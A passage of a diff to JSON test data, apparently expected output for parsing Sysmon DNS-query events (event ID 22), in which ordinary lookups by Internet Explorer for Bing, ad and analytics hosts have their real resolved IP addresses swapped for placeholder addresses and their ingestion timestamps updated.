"original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -1174,12 +1168,12 @@ }, "answers": [ { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -1194,13 +1188,13 @@ "contextual.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313754253Z", + "ingested": "2021-12-09T13:49:44.739138600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1276,12 +1270,12 @@ "type": "CNAME" }, { - "data": "152.195.32.120", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "network": { @@ -1300,13 +1294,13 @@ "at.atwola.com" ], "ip": [ - "152.195.32.120" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313755546Z", + "ingested": "2021-12-09T13:49:44.739142200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1374,15 +1368,15 @@ "type": "CNAME" }, { - "data": "204.13.192.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.120", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -1390,7 +1384,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -1398,7 +1392,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -1406,20 +1400,20 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "204.13.192.56", - "204.13.192.120", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -1436,21 +1430,20 @@ "m.adnxs.com" ], "ip": [ - "204.13.192.56", - "204.13.192.120", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313756773Z", + "ingested": "2021-12-09T13:49:44.739147Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1514,12 +1507,12 @@ "type": "CNAME" }, { - "data": "74.6.137.78", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "74.6.137.78" + "89.160.20.156" ] }, "network": { @@ -1535,13 +1528,13 @@ "cms.analytics.yahoo.com" ], "ip": [ - "74.6.137.78" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313758031Z", + "ingested": "2021-12-09T13:49:44.739151900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1609,12 +1602,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -1631,13 +1624,13 @@ "cvision.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313759226Z", + "ingested": "2021-12-09T13:49:44.739157800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.028Z", @@ -1705,17 +1698,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -1732,14 +1725,13 @@ "g.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313760383Z", + "ingested": "2021-12-09T13:49:44.739164Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": 